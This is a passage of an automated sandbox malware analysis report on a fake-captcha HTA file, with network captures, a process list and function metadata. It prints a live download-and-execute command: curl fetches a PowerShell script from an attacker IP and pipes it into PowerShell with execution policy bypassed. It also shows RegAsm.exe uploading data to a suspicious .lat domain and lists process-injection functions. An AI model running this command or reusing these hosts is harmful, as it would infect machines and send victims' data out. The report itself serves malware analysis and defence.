2024-12-20 06:18:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-20 06:18:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	172.67.197.170	443	7432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 06:18:19 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LXVLWAQ0XJVMO2E3BHW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 549547 Host: discokeyus.lat
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: 2d 2d 4c 58 56 4c 57 41 51 30 58 4a 56 4d 4f 32 45 33 42 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 58 56 4c 57 41 51 30 58 4a 56 4d 4f 32 45 33 42 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 58 56 4c 57 41 51 30 58 4a 56 4d 4f 32 45 33 42 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61 Data Ascii: --LXVLWAQ0XJVMO2E3BHWContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--LXVLWAQ0XJVMO2E3BHWContent-Disposition: form-data; name="pid"1--LXVLWAQ0XJVMO2E3BHWContent-Disposition: form-data; name="lid"DUkgLv--ta
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: 54 84 37 84 e6 bf 74 1e d7 fe b7 b2 67 04 77 02 27 6b 59 f1 0c 65 98 ee 71 2a 55 2b c5 0f 92 da f8 a9 eb 18 13 27 ba 97 6d fc c0 e4 53 e0 78 38 55 f9 fe 79 04 d4 1b a2 34 14 be 1b 37 0c 78 92 63 62 fd 7f 2e 23 ec ab 00 9a b8 9c 9b 6d f1 97 01 db 27 f9 e8 34 b6 82 98 e9 02 dd d3 58 20 76 45 1d 56 ca 27 24 87 f8 16 9c 75 16 14 08 90 26 ae df 18 3f 11 27 40 9b 2f 56 9f 8a bf 13 6e b7 11 11 70 2c 6c 2f c3 e8 0f 21 5b 67 e7 83 28 e3 20 bc 3e 28 e9 08 f2 9f cc 83 e0 6c a8 52 0a 7f a4 19 2e dc 0f 1c b4 3a 01 b9 9a e7 2d 88 54 df b8 b4 28 70 e3 df 96 8f 03 2e 7d 63 7d ef d2 46 ec 87 9c de a1 43 35 eb 37 ae 52 a1 02 fb 8a 0e 93 92 ab 89 21 ae 93 69 51 28 b8 77 bf 8f 88 11 26 14 99 76 62 68 5a 0e 06 24 f9 c7 53 73 41 71 b0 a3 cb 9a 43 83 06 7e 3a 60 e9 e0 fb 3e 3d Data Ascii: T7tgw'kYeq*U+'mSx8Uy47xcb.#m'4X vEV'$u&?'@/Vnp,l/![g( >(lR.:-T(p.}c}FC57R!iQ(w&vbhZ$SsAqC~:`>=
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: 9b fc c5 31 fd 28 26 c8 b6 9b 83 09 ab 6c 0d 73 e7 bd 9c d3 2c 85 94 8f 1c c9 17 c3 bc c7 34 4b 87 0c e4 f9 58 c9 49 5d 5a 6a 9d 48 a9 97 e8 c2 d4 6a 29 bc 6d 0d c6 07 0c d7 52 4d b8 df 3f 8e c7 95 8d 4e 4e 4f 47 d7 e9 4f 28 39 ab 80 9d 8e 11 10 41 6e 1f 9e 6a 19 48 54 51 52 8c 88 fb f5 fe c4 31 f9 48 03 a7 2e 43 9c df 71 15 3e 3f 5e be 5a 57 07 f7 a8 b1 ec d7 bb 0c 02 ff 5d 35 eb 69 81 57 25 3c 3c 9a 9f 47 3c 16 cd 2f b4 a6 d4 b7 24 b4 b3 49 4e fb d5 46 ed a3 38 82 1c 4a 68 0f ce e4 a1 ee 92 78 a5 ca 2b c1 d4 96 3b a1 b5 7b f2 27 e5 fa f9 bf ab 67 4d 5e 19 fd 7d 36 fa 6a 7a c8 3e be bb 41 a2 7d d4 66 c3 e7 8d d1 b0 bf f8 2f c5 da a9 10 7e f4 4f 66 f7 ba d3 15 bf 47 99 86 88 ce 2c d1 ac dc 16 59 a1 f5 e1 d8 63 43 50 77 d4 96 c8 d3 1d 05 2a e9 2c e5 09 5e Data Ascii: 1(&ls,4KXI]ZjHj)mRM?NNOGO(9AnjHTQR1H.Cq>?^ZW]5iW%<<G</$INF8Jhx+;{'gM^}6jz>A}f/~OfG,YcCPw*,^
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: 09 12 27 a6 45 5a 88 0c 77 5c e7 2e aa 00 9d f3 c9 55 dc ad 0d dc 72 df ab 63 b7 37 50 d2 98 66 f4 f2 d6 b3 58 aa 18 bb ec e6 6e 7a 94 f5 a7 67 7b 3f a1 61 46 e5 92 cb 81 8d 17 fd 02 3d 99 15 9f 47 6a 2a 5e fe c3 62 72 f3 63 4f 57 4f ad fc 71 62 52 9b cf 09 75 8d fd dc fa 4d f5 35 76 b7 79 c5 b9 f6 69 7f 26 35 6f 2f 70 14 2e 02 98 5b a7 81 e3 85 1d 3c 3b 75 7a 65 0b 85 59 6e c3 12 ac d2 03 6d 1c 8e 3a 3e dc e6 eb fa a3 7b 11 56 13 72 93 05 d2 40 36 26 e4 96 d7 3c 44 b7 0b b5 37 f8 a0 8e 9f e9 7d 43 6e 33 79 1a 6e a1 05 1c 3e fe da 40 7c 84 29 f0 90 ff ff 8e 40 47 32 47 21 50 86 86 9a 0c c0 b5 b2 5c 44 64 49 44 6a 96 a2 c0 85 90 a7 da 7c 6b 74 71 55 ec ab 57 8a 43 5a 3f 00 61 0f d1 11 f3 0c 4b fc 32 e9 ea c1 0d 2c 7e 62 18 a5 82 02 89 1f 39 21 36 11 36 89 Data Ascii: 'EZw\.Urc7PfXnzg{?aF=Gj*^brcOWOqbRuM5vyi&5o/p.[<;uzeYnm:>{Vr@6&<D7}Cn3yn>@\|)@G2G!P\DdIDj\|ktqUWCZ?aK2,~b9!66
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: 94 f9 fe 21 12 b3 65 23 88 3d c2 e0 d7 30 29 37 d9 67 b8 6f 20 e7 55 49 d9 e7 fe 69 a2 1c 44 59 0a 93 7a c6 41 ff 2f 2a 5c a6 2f cf 7b 69 db d3 08 f3 7c 19 f9 da 05 30 95 30 27 e4 d5 fc 1e 33 96 91 68 6a 4f fc 37 12 81 a6 86 8a ed 91 c6 ce a3 3c d1 e6 ed 28 73 27 8d 5f 97 f1 2f fd b6 de 83 e8 8e 73 01 ac 3e 04 89 65 04 30 7d d3 e9 36 6b 66 76 e7 c9 d5 13 9c 6b 06 78 fc 94 6e f0 57 c9 40 2c 0f 46 18 d3 ab 30 8e 66 44 15 75 1b cd c9 7e b0 66 34 19 63 c3 85 1a e5 ad dc 33 9d 92 46 47 c6 ef cc 0c 55 c4 6f be 14 a0 f0 73 ee 8c 06 63 eb 49 b5 d7 99 cc 88 bf 07 c9 75 12 91 c6 75 08 76 20 4c a2 1c 75 89 48 eb 43 33 e2 ca d5 d3 e1 7b 7c 4b 4f f9 54 24 93 2d ed 33 12 70 42 82 fb 19 25 7b 76 e9 70 49 df 65 4d 6f 3c 93 88 3c cc 67 52 f5 63 a5 49 eb e6 6a 66 eb 16 77 Data Ascii: !e#=0)7go UIiDYzA/*\/{i\|00'3hjO7<(s'_/s>e0}6kfvkxnW@,F0fDu~f4c3FGUoscIuuv LuHC3{\|KOT$-3pB%{vpIeMo<<gRcIjfw
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: d4 3b 09 71 a4 be 17 3c 6c 9d 47 cf 3e 4d 31 33 1c 98 38 1a b3 ab fa ef fb dd 18 52 92 9a a9 1c f7 23 51 37 98 14 47 fa f6 30 ea f9 61 59 51 e0 d8 24 37 14 a9 f3 f5 db 92 65 7a 45 47 53 3c e7 8a b0 f8 8f bf b9 1d ae d8 3b 70 90 3f 74 02 13 ea 8f fa b1 80 8b cd aa 33 a1 99 87 4d 84 48 70 e6 9f 04 56 7a b1 12 54 ae 8d 83 65 df f4 8a c2 ec dd 32 b0 21 06 7e c9 c5 ae 8f 12 1d 6c 7b 75 96 58 5d df 2d 61 7b e1 85 17 4f ff 77 98 e6 7a 06 f6 0e 97 b4 08 fd 15 62 27 aa ca 44 52 61 9b b1 5a 51 96 dd ba 5a ed 33 94 a1 ee 87 79 af 0f ee cf 3e 73 01 7d 73 8d 71 66 67 a6 c8 55 e8 26 55 5d 73 19 3d 8b 5e ce 99 b1 39 4a a6 b3 96 54 69 63 00 bc 45 33 e6 59 7d a4 34 11 40 d8 23 16 a5 c4 cd 6e d8 5e 1b fc 77 5d 72 a4 86 d9 39 f5 33 41 ee b8 33 bc 0f 34 a8 ec ec 77 98 6d 81 Data Ascii: ;q<lG>M138R#Q7G0aYQ$7ezEGS<;p?t3MHpVzTe2!~l{uX]-a{Owzb'DRaZQZ3y>s}sqfgU&U]s=^9JTicE3Y}4@#n^w]r93A34wm
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: 56 af 08 cb 03 17 bc ff 60 c6 14 dc 5c 59 0a b5 e4 51 f2 18 b6 f9 7f d7 8e fd cf 51 ab d3 db e7 bf dd a8 26 a5 2b 2b fe 69 17 71 04 18 36 85 43 d8 51 5c d4 e4 88 8f d6 f3 8f 63 f1 2e 77 02 bf 1d 79 b4 b4 95 e9 65 bc 4f 64 c3 cb 51 40 a1 ba e7 a5 37 a6 68 f8 32 0e 8f f8 fe 3b 1d 3b 56 bc 60 4e e2 ff ba d9 8e a8 03 d2 4e 55 46 37 b3 cd 53 7d 9f 38 b8 f2 4f ea 8e 58 67 1e 44 91 20 4c 28 ed b1 47 8e cd d7 42 60 f6 59 28 44 94 cb 52 86 1c 85 7b 4f 72 b4 ce a5 71 ef f5 a0 63 fa f0 2e 17 89 81 bc f7 23 2d da 36 35 6b 45 b3 3c e4 4a d6 34 33 47 a8 53 34 dc 45 b2 38 a2 fa 08 b0 18 cd d4 40 7d c7 f6 fe a5 0d 57 34 5c c5 41 6a 0d d8 d8 ab 91 e5 90 b5 a3 bd 04 e0 a9 71 82 88 43 21 78 56 b1 73 76 96 c8 24 eb f0 e0 f7 2b 94 ca 5d b7 95 98 23 13 2c 4b b1 2c 6c d8 cf 5f Data Ascii: V`\YQQ&++iq6CQ\c.wyeOdQ@7h2;;V`NNUF7S}8OXgD L(GB`Y(DR{Orqc.#-65kE<J43GS4E8@}W4\AjqC!xVsv$+]#,K,l_
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: 09 4c e8 6a 08 ba 49 c3 3a ea 6a 5a 5c 39 3b 89 7c b4 b4 b9 a2 b7 f5 c9 56 ed 9b 5f 16 84 94 04 19 2b b6 11 8f 0e 0e e7 2f 1a d8 f4 66 17 77 b4 a3 db fe 18 0a 06 81 47 50 86 c3 de d2 4b c5 72 29 23 2e a7 36 a5 11 9e cb ce 99 c6 4d e8 53 88 d0 48 ac 17 52 9d ba 9a 9d ba eb 0d 06 b8 9c 5f 97 63 c5 3b e3 e5 83 bf fb c2 da f8 e2 a4 6f be 43 f9 d7 a6 32 58 7a 3b f6 b2 88 8c 26 74 93 ac 22 82 a9 d8 6b 90 b0 51 c5 21 dc cb 31 dd df 3f 12 45 51 18 bd b5 4a ae 3c ce d1 ab af e6 a6 fc 03 7a 14 21 0d a3 63 5a 2b d5 cb 1e d6 96 38 31 91 61 f5 29 21 9c db c7 9f 5c 60 55 3a 38 75 24 f7 48 68 f2 91 93 e7 ff 9d 36 63 91 d6 45 77 d8 11 25 df d8 62 db 66 e5 a2 56 7a 4e 43 19 d9 3e 89 3b 2f 2e 4d 1b 8e 7e b2 83 3e f3 3c 81 cf 62 c1 bc 70 5f fa 39 a0 b5 70 80 58 82 40 1c e5 Data Ascii: LjI:jZ\9;\|V_+/fwGPKr)#.6MSHR_c;oC2Xz;&t"kQ!1?EQJ<z!cZ+81a)!\`U:8u$Hh6cEw%bfVzNC>;/.M~><bp_9pX@
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: 5a e6 ec 6b 6d 16 06 8b 6c 84 15 18 78 88 2f c9 ce a6 e9 e0 c8 26 b1 fd ff ff 89 09 67 00 a7 ed e8 07 64 71 e7 50 bb 0c 51 1d fa 91 3f de f9 6e 5d d6 96 9f a8 36 27 68 0a 00 09 ac 54 aa 7b 9e 1a 61 41 4f cf 08 7d f4 6e 83 fe d0 89 01 df f4 27 ad dd 9f 1f e6 9b 09 f2 6e cd db 7f 32 a2 fe ef 96 98 20 08 f1 59 5c 44 03 6d fc 15 1c 78 8b 2e 14 40 0d 93 c9 92 ff 04 a7 69 fb 24 6e 1e ab b1 34 e6 f7 d5 41 30 60 c0 09 72 8e 2c b5 17 45 0f 70 28 54 1a e6 4a 1e ee 97 1a 71 8d c7 8e a8 d2 05 30 da 2c cf 68 6a 30 c0 af 3f 66 8d ad 00 3e 15 f3 c1 e3 22 6f b6 e2 f6 4d 5b a1 79 ed 7c f8 cc 9c a9 9a 13 a7 36 9f 55 a4 1a f3 0a 8e 89 df 83 60 a3 6e fd f5 2b 0e 12 a8 eb 09 13 10 b8 41 c0 35 e0 ea 95 a3 42 76 53 f9 01 84 83 56 88 7b 43 77 72 ed 5a 73 66 c9 2e 36 a6 4e 23 d8 Data Ascii: Zkmlx/&gdqPQ?n]6'hT{aAO}n'n2 Y\Dmx.@i$n4A0`r,Ep(TJq0,hj0?f>"oM[y\|6U`n+A5BvSV{CwrZsf.6N#
2024-12-20 06:18:19 UTC	15331	OUT	Data Raw: c7 9c db e1 e4 46 94 5c 6a 8a b7 88 46 bc 85 c5 33 2d 85 2b c9 22 a4 5d eb 37 8d b4 d7 1c d4 33 f9 22 9d 47 4e 46 d0 5f de 94 9c 30 b5 fc 14 cd bf c1 e7 43 40 d7 5e 47 13 ce f0 5f 93 14 74 9c d7 a7 09 7c b5 ff bf 97 de 58 c7 e9 9d cc 84 f8 98 c4 b2 9d 86 bc cc bb 6a 5e 82 88 37 66 d1 63 8d 89 80 61 77 14 e4 1f 9e 51 81 f2 7f 99 31 dd 1d 86 2f 5e fd 22 5a b9 f3 66 31 5b 03 01 91 5f 5c 53 4f 7b b3 ae e6 87 33 12 f2 97 6a 26 5c a6 e0 89 da 26 52 05 5a 5d c0 b2 75 47 e8 51 18 86 a9 41 31 6a 85 a6 38 6f f7 eb cb 45 2a 29 13 00 76 72 f4 8e f3 37 86 7c 67 07 7a 7a 48 1f 70 9d 3f 30 5a 13 de 73 5b c0 31 68 e1 d5 bc bd 0a b1 85 9e e5 31 58 29 37 58 72 d7 25 5f 6c 61 20 4c 2a d2 bb 59 b9 63 6c a9 58 9b 1e 45 ad 9b f5 c8 0b 41 b8 17 30 f6 e7 fa d8 2b c2 20 c4 7b 6e Data Ascii: F\jF3-+"]73"GNF_0C@^G_t\|Xj^7fcawQ1/^"Zf1[_\SO{3j&\&RZ]uGQA1j8oE)vr7\|gzzHp?0Zs[1h1X)7Xr%_la LYclXEA0+ {n
2024-12-20 06:18:23 UTC	1139	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:18:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d83b3nb2aao6tirbjf2v7182cd; expires=Tue, 15 Apr 2025 00:05:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZICPfnb%2FNZd%2FM35YEz4lgzojt6uOFHCupTj2qF0PeBUb0RpaJJ7GR3mxPXC%2BsEbMFaER%2FUB6rp%2BiiItZb2gu4pAApWubS9naJ4wmtGwWlBSoL551EaSL54Xe55z%2F7hPv1w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4d83b08f567271-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2055&min_rtt=2026&rtt_var=781&sent=194&recv=573&lost=0&retrans=0&sent_bytes=2832&recv_bytes=552027&delivery_rate=1441263&cwnd=225&unsent_bytes=0&cid=ca61afb93b22fa03&ts=3765&x=0"

Target ID:	0
Start time:	01:17:57
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\Captcha.hta"
Imagebase:	0xfc0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:17:57
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:17:57
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:17:57
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1
Imagebase:	0xac0000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:17:57
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -NoProfile -ExecutionPolicy Bypass -Command -
Imagebase:	0xc70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:18:02
Start date:	20/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"
Imagebase:	0x4f0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:18:03
Start date:	20/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP"
Imagebase:	0x400000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:18:03
Start date:	20/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Imagebase:	0xb40000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 05F50FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1681048870.0000000005F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5f50000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 48bbdcb85228a6cff182476d488c47a598f7e3bc30bf842b6935cf8546523e83
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 05F50FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1681048870.0000000005F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5f50000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 48bbdcb85228a6cff182476d488c47a598f7e3bc30bf842b6935cf8546523e83
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 05F50FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1681048870.0000000005F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5f50000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 48bbdcb85228a6cff182476d488c47a598f7e3bc30bf842b6935cf8546523e83
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 7100, Parent PID: 6812COMMON

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	1

Executed Functions

Function 079125A0 Relevance: 10.5, Strings: 8, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 07912A75
(o^q, xrefs: 07912A65
4'^q, xrefs: 07912807
tP^q, xrefs: 079129E9
tP^q, xrefs: 079129DD
4'^q, xrefs: 079127FB
4'^q, xrefs: 07912652
4'^q, xrefs: 07912646

Memory Dump Source

Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
API String ID: 0-2387245862
Opcode ID: 4c42f6b7d40724653587fab39b4ef88e54de7e3754a42a3c488617d828a6daa3
Instruction ID: 6f4eca86f11c7a23a93cec7c8f8cf7159e84109f8b1e724e464bad639202b869
Opcode Fuzzy Hash: 4c42f6b7d40724653587fab39b4ef88e54de7e3754a42a3c488617d828a6daa3
Instruction Fuzzy Hash: C5022771B4420E8FCB14EF68D944B6ABBE6FF85324F1484AAD4058F391DB31D865C791

Function 07911F70 Relevance: 9.2, Strings: 7, Instructions: 496
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 079123F0
4'^q, xrefs: 07912068
4'^q, xrefs: 07912074
4'^q, xrefs: 07912417
4'^q, xrefs: 0791240B
$^q, xrefs: 079123E4
$^q, xrefs: 0791238E

Memory Dump Source

Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3199432138
Opcode ID: 725fcef198ec09e2eee45615e803144d8f33af98564dae039ff9f9206b23f197
Instruction ID: c105c654f071d53534b482a75c7b7d5a53daa82d5ef4a8399b86405a1bf2d189
Opcode Fuzzy Hash: 725fcef198ec09e2eee45615e803144d8f33af98564dae039ff9f9206b23f197
Instruction Fuzzy Hash: 71F15AB170430E8FCB15AB79981076EBBE9BF85218F24847AD505CB291DF31C9A6C7A1

Function 079122BC Relevance: 3.9, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 0791240B
$^q, xrefs: 079123E4
$^q, xrefs: 0791238E

Memory Dump Source

Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: c5b7c4d026f0b7e81a14e8b334203be354229a04866713ea69ee75a6f55d1439
Instruction ID: 64e7f7ff48e0ba1021c58a89368932707de2081aa235ef6f2f9b4eda5c07578e
Opcode Fuzzy Hash: c5b7c4d026f0b7e81a14e8b334203be354229a04866713ea69ee75a6f55d1439
Instruction Fuzzy Hash: 003137F0B0430ECFDB20BF248900779BBA9BF81B18F644426D804DB191EB75D5A6C7A1

Function 04E569EC Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04E56C2E

Memory Dump Source

Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 44b097f61a40d1ca2e7c3cd1cd34626ecae8b6b2ff622b35ecbc586e4ecb71e4
Instruction ID: 4d289ccb2bda2c33e346971701a249ad531be139691be5b4092b28bf76262ed8
Opcode Fuzzy Hash: 44b097f61a40d1ca2e7c3cd1cd34626ecae8b6b2ff622b35ecbc586e4ecb71e4
Instruction Fuzzy Hash: 7EA16D71D002199FEF20DFA8C8417EDBBB2FF48318F5485A9E849A7250DB74A985CF91

Function 04E569F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04E56C2E

Memory Dump Source

Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1facda0c527549d8a69fa41c61ac132772aae60489eb1efe06d4e40707842d73
Instruction ID: 9f9b4ed60fc2657959cf7b401084b9659ba551b2fd4429e8127903845fd929d2
Opcode Fuzzy Hash: 1facda0c527549d8a69fa41c61ac132772aae60489eb1efe06d4e40707842d73
Instruction Fuzzy Hash: 93916B71D002199FEF20DFA9C8417DDBBB2FF48318F1485AAE849A7250DB74A985CF91

Function 04E56768 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

